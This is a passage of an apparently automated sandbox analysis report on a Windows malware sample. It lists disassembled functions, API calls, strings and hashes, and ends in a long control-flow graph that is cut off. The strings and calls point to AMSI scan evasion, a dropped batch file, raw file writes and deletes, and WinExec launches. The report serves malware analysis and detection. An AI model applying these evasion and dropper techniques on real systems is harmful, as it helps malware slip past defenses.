                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Handle$Close$AddressCreateLibraryLoadModuleObjectProcProcessSingleUserWait
                                                                                                                                                                                    • String ID: *"C:\Users\Public\Libraries\RdxcjsngO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
                                                                                                                                                                                    • API String ID: 1205125484-624790493
                                                                                                                                                                                    • Opcode ID: c579e8a8b22490cd27e4ca0a45e7696e18f919c53bd68bcab778f3a3172fc78e
                                                                                                                                                                                    • Instruction ID: 1339aaaa5a2e856287786221940d4b4f845eb817f35ca706a3d40e19d946517f
                                                                                                                                                                                    • Opcode Fuzzy Hash: c579e8a8b22490cd27e4ca0a45e7696e18f919c53bd68bcab778f3a3172fc78e
                                                                                                                                                                                    • Instruction Fuzzy Hash: E0F10F78A203589FDB14FBA5D880FDD73B5AF46700F1090A2A118AF615DBB4EE86CF51
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03247966 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24librarymemorynativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 03247975
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0324797B
                                                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0324799B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • NtAllocateVirtualMemory, xrefs: 0324796B
                                                                                                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 03247970
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                                                                    • API String ID: 421316089-2206134580
                                                                                                                                                                                    • Opcode ID: 5d731eba985c32cf59aa2cc2e7c458ad8bb6ce23ae3485bdad0318528aadfe2b
                                                                                                                                                                                    • Instruction ID: 91f6ff263a3a101f1dcd2fde8543824e1f5be88f3fdeb32d33bbc14f45cc4dbd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d731eba985c32cf59aa2cc2e7c458ad8bb6ce23ae3485bdad0318528aadfe2b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 75E092B565030CBFCB01EFA8DC85EDA779CAB09650F004412BB24D7501D774E9508BB5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03247968 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23librarymemorynativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 03247975
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0324797B
                                                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0324799B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • NtAllocateVirtualMemory, xrefs: 0324796B
                                                                                                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 03247970
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                                                                    • API String ID: 421316089-2206134580
                                                                                                                                                                                    • Opcode ID: 2f30551fef170720ba5d5de4a92b48a26210dc3d6a819cedcadbf41ab7dbb197
                                                                                                                                                                                    • Instruction ID: 218df782a5d4e6f6dfafa5adc3c8e652edea5a5d053adb3b3a93b9bb65fb0b11
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f30551fef170720ba5d5de4a92b48a26210dc3d6a819cedcadbf41ab7dbb197
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DE09AB665030CBFCB01EFA8D885EDA77ACAB09650F008412BB28D7501D7B4E5908BB9
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0324C4DC Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03234EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 03234EF2
                                                                                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0324C5AC), ref: 0324C517
                                                                                                                                                                                    • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0324C5AC), ref: 0324C547
                                                                                                                                                                                    • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0324C55C
                                                                                                                                                                                    • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0324C588
                                                                                                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0324C591
                                                                                                                                                                                      • Part of subcall function 03234C24: SysFreeString.OLEAUT32(0324D42C), ref: 03234C32
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1897104825-0
                                                                                                                                                                                    • Opcode ID: 66be75d52af871f1259df55f7bb2431b4249eecef1f7e1db194e8c496bf525fa
                                                                                                                                                                                    • Instruction ID: d01a89b452f49dcd50b3f428ec73611d75cc14b7b9067a5fe6b0052506de82f6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 66be75d52af871f1259df55f7bb2431b4249eecef1f7e1db194e8c496bf525fa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7021C175A60318BADB15EAE9CC42FDE77BCEB49700F500461B610FB180EBF4AA458794
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0324C8AC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0324C9EA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CheckConnectionInternet
                                                                                                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                                                                                                    • Opcode ID: bb1b019acc8f7936e329835dadc56d47113a419dd14ed8bc2af58bad1237fa4b
                                                                                                                                                                                    • Instruction ID: ad22b2ca216d41e0784dea8e4269e70fdd1e9f27c0996fc81714b5b3d17aac7a
                                                                                                                                                                                    • Opcode Fuzzy Hash: bb1b019acc8f7936e329835dadc56d47113a419dd14ed8bc2af58bad1237fa4b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A415279B30368AFDB04FFA9D840EDEB3F5EF49600F204462E050BB645DAB4AD818B50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0324C3F6 Relevance: 6.1, APIs: 4, Instructions: 81nativefileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03234EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 03234EF2
                                                                                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0324C4CA), ref: 0324C437
                                                                                                                                                                                    • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0324C471
                                                                                                                                                                                    • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0324C49E
                                                                                                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0324C4A7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3764614163-0
                                                                                                                                                                                    • Opcode ID: da78033a22f9e8d4722a267ee8c3aa3b86229e661d3853262e93bcc8501e8b62
                                                                                                                                                                                    • Instruction ID: 723c5cadb24448022aa481b3511d50124c7831fd7f903658c72314abe08ccd7c
                                                                                                                                                                                    • Opcode Fuzzy Hash: da78033a22f9e8d4722a267ee8c3aa3b86229e661d3853262e93bcc8501e8b62
                                                                                                                                                                                    • Instruction Fuzzy Hash: EE211075A61318BAEB10EBA4CD42FEEB7BCEB04B00F6044A1B610FB1C0D7F0AE448654
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0324C3F8 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03234EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 03234EF2
                                                                                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0324C4CA), ref: 0324C437
                                                                                                                                                                                    • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0324C471
                                                                                                                                                                                    • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0324C49E
                                                                                                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0324C4A7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3764614163-0
                                                                                                                                                                                    • Opcode ID: 063d9ce804bbd93d0b6528190e2cb861a5a3bdc4585bf4bd5232729cd7b2edbd
                                                                                                                                                                                    • Instruction ID: c361c60010d3a33a92901888b87327eee9e1741af910a2b6cf7465e2306a588d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 063d9ce804bbd93d0b6528190e2cb861a5a3bdc4585bf4bd5232729cd7b2edbd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D212175A61318BAEB10EBA4CD42FEEB7BCEB04B00F6044A1B610FB1C0D7F06E448654
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0324C368 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03234EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 03234EF2
                                                                                                                                                                                    • RtlInitUnicodeString.N(?,?,00000000,0324C3E2), ref: 0324C390
                                                                                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0324C3E2), ref: 0324C3A6
                                                                                                                                                                                    • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0324C3E2), ref: 0324C3C5
                                                                                                                                                                                      • Part of subcall function 03234C24: SysFreeString.OLEAUT32(0324D42C), ref: 03234C32
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1694942484-0
                                                                                                                                                                                    • Opcode ID: 5307c68e1b3688f1344206279d00ba80d1aaccafd377184db5cb19e6157ed970
                                                                                                                                                                                    • Instruction ID: ca49ca95d9f18478366f7e0c6e35401111e1d3a47e3434d61e4135be822ee4b5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5307c68e1b3688f1344206279d00ba80d1aaccafd377184db5cb19e6157ed970
                                                                                                                                                                                    • Instruction Fuzzy Hash: 54014475961308BEDB04EBA4CC81FCDB7FCEB48700F5044A1A600EA580FBB4AB448664
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03246D84 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03246D28: CLSIDFromProgID.OLE32(00000000), ref: 03246D55
                                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,03246E68,00000000), ref: 03246DD3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFromInstanceProg
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2151042543-0
                                                                                                                                                                                    • Opcode ID: 154e0e282f29362344a5feb2b0e7a042f1d8d32a8267fa0e047c658bbcfc755e
                                                                                                                                                                                    • Instruction ID: 27403853c49ae17da5100f0ecc7a33afc03422eb372745aaca61e9cf7c0297e4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 154e0e282f29362344a5feb2b0e7a042f1d8d32a8267fa0e047c658bbcfc755e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A01A775724704AFD709DFA1DC12D6F7BECD74BB10F910475F500E6A40E6B05950C5A4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03251AC0 Relevance: 46.7, APIs: 2, Strings: 23, Instructions: 2959sleepprocessCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 5810 3251ac0-3252d78 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234da4 * 2 call 3234728 call 324c3f8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 324c74c call 32344f4 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234da4 * 2 call 3234728 call 324c3f8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 324c74c call 32344f4 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234da4 * 2 call 3234728 call 324c3f8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 324c74c call 32344f4 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234da4 * 2 call 3234728 call 324c3f8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234964 call 3234698 call 3237e18 6319 3253345-3253c13 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 324c78c call 32344f4 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3237a88 call 324d270 call 32344f4 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 324d198 call 324d20c call 32344f4 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 32348b0 5810->6319 6320 3252d7e-325333a call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234964 call 3233208 call 324ca6c call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 Sleep call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234964 call 3234d38 call 324c368 call 3234964 call 3234d38 call 324c368 call 3234964 call 3234d38 call 324c368 call 3234964 call 3234d38 call 324c368 call 3234964 call 3234d38 call 324c368 call 3234964 call 3234d38 call 324c368 call 3234d38 call 324c368 call 3234d38 call 324c368 call 3234d38 call 324c368 call 3234d38 5810->6320 6760 32553e0-325565b call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 32348b0 6319->6760 6761 3253c19-3253c5e call 3234824 call 3234964 call 3234698 call 3237e18 6319->6761 6320->6319 6686 3253340 call 324c368 6320->6686 6686->6319 6906 3255661-3255c06 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 32347b0 call 3234964 WinExec call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234964 call 3234698 call 3249e70 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3233694 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 6760->6906 6907 3256190-325638f call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 32348b0 6760->6907 6761->6760 6779 3253c64-3254465 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 WinExec call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 6761->6779 7556 325446a-32544d5 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 6779->7556 7555 3255c0b-3255cb3 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 